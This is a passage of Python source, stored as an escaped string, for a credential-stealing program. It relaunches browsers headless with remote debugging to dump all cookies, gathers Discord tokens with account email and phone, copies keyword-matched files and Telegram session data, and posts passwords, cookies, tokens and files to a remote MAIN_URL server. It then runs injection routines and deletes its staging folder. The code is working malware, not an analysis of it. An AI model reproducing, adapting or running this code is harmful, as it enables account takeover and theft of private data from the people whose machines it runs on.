"username": username,\n "displayname": token_data["global_name"], "email": token_data["email"],\n "phone": phone_number})\n TOKENCOUNT = TOKENCOUNT+1\n except:\n pass\n\n\nfor browser in CHROME_PATHS:\n if os.path.exists(browser["path"]):\n try:\n taskkill(browser["taskname"])\n strtcmd = f\'"{browser["exepath"]}" --headless --remote-debugging-port=9222 --remote-allow-origins=* --user-data-dir="{browser["path"]}"\'\n subprocess.Popen(strtcmd, creationflags=subprocess.CREATE_NEW_CONSOLE, close_fds=True)\n targets = requests.get("http://localhost:9222/json").json()\n ws_url = targets[0]["webSocketDebuggerUrl"]\n ws = websocket.create_connection(ws_url)\n payload = {\n "id": 1,\n "method": "Network.getAllCookies"\n }\n ws.send(json.dumps(payload))\n cookie_str = ""\n for cookie in json.loads(ws.recv())["result"]["cookies"]:\n cookie_str += f"{cookie[\'domain\']}\\tTRUE\\t/\\tFALSE\\t13355861278849698\\t{cookie[\'name\']}\\t{cookie[\'value\']}\\n"\n COOKIECOUNT = COOKIECOUNT+1\n COOKIES.append({"browser": browser["name"], "profile": "Default", "cookies": base64.b64encode(cookie_str.encode()).decode()})\n ws.close()\n taskkill(browser["taskname"])\n except: pass\n\nfor path in PATHS_TO_SEARCH:\n for root, _, files in os.walk(path):\n for file_name in files:\n for keyword in FILE_KEYWORDS:\n if keyword in file_name.lower():\n for extension in ALLOWED_EXTENSIONS:\n if file_name.endswith(extension):\n try:\n realpath = os.path.join(root, file_name)\n if os.path.isfile(realpath):\n shutil.copy(realpath, STORAGE_PATH)\n else:\n zip_to_storage(realpath, STORAGE_PATH)\n except:\n pass\n\ndef telegram():\n try:\n kill_process("Telegram.exe")\n except:\n pass\n source_path = os.path.join(APPDATA, "Telegram Desktop", "tdata")\n \n if os.path.exists(source_path):\n zip_to_storage("tdata_session", source_path, STORAGE_PATH)\n\ntry:\n telegram()\nexcept:\n pass\n\ndef create_log():\n for i in range(10):\n payload = {\n "passwordcount": len(PASSWORDS),\n "cookiecount": COOKIECOUNT,\n 
"discordtokencount": len(DISCORD_TOKENS),\n "filenames": FILES,\n }\n headers = {"X-User-Identifier": userid, "Content-Type": "application/json"}\n\n try:\n r = requests.post(MAIN_URL + "/create_log", json=payload, headers=headers)\n if r.status_code == 200:\n return r.json()["log_uuid"]\n else:\n continue\n except:\n continue\n\n return ""\n\ndef upload_data(loguuid):\n payload = {\n "passwords": PASSWORDS,\n "cookies": COOKIES,\n "discord_tokens": DISCORD_TOKENS,\n "refresh_tokens": WEB_DATA\n }\n headers = {"X-Trace-ID": loguuid, "Content-Type": "application/json"}\n requests.post(MAIN_URL + "/log_data", json=payload, headers=headers)\n\ndef upload_files(filepath, loguuid):\n url = MAIN_URL + "/log_files"\n\n files = {\'file\': open(filepath, \'rb\')}\n headers = {"X-Trace-ID": loguuid}\n requests.post(url, files=files, headers = headers)\n\nfor file_to_upload in os.listdir(STORAGE_PATH):\n FILES.append(file_to_upload)\n\ntry:\n loguuid = create_log()\n upload_data(loguuid)\n for file_to_upload in os.listdir(STORAGE_PATH):\n upload_files(os.path.join(STORAGE_PATH, file_to_upload), loguuid)\nexcept: pass\n\nfor i in range(2):\n try:\n inject(loguuid)\n inject_atomic(loguuid)\n break\n except: pass\n\ntry:\n os.removedirs(STORAGE_PATH)\nexcept: pass' |